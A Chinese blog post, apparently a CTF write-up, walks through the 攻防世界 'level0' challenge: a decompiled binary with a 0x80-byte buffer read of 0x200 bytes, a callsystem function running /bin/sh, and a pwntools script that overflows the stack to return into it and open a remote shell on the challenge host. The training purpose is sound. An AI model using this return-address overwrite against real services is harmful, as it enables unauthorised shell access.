攻防世界 | level0

先反编译 :

int __cdecl main(int argc, const char **argv, const char **envp)
{
  write(1, "Hello, World\n", 0xDuLL);
  return vulnerable_function();
}

追踪一下 "vulnerable_function()" :

ssize_t vulnerable_function()
{
  char buf; // [rsp+0h] [rbp-80h]
  return read(0, &buf, 0x200uLL);
}

read()函数

原型:ssize_t read(int fd,void*buf,size_t count)
参数说明:
fd:      是文件描述符,对应0
buf:     为读出数据的缓冲区;
count:   为每次读取的字节数(是请求读取的字节数,读上来的数据保
         存在缓冲区buf中,同时文件的当前读写位置向后移)

查找字符串发现了shell,找到函数:

int callsystem()
{
  return system("/bin/sh");
}

找到入口地址:

 

 找到payload长度:

 

paylaod:

from pwn import *
r = remote("111.198.29.45",43164)
payload = 'A' * 0x80 + 'a' * 0x8 + p64(0x00400596)
r.sendline(payload)
r.interactive()

 

posted @ 2019-10-30 16:46  东坡肉肉君  阅读(1288)  评论(0编辑  收藏  举报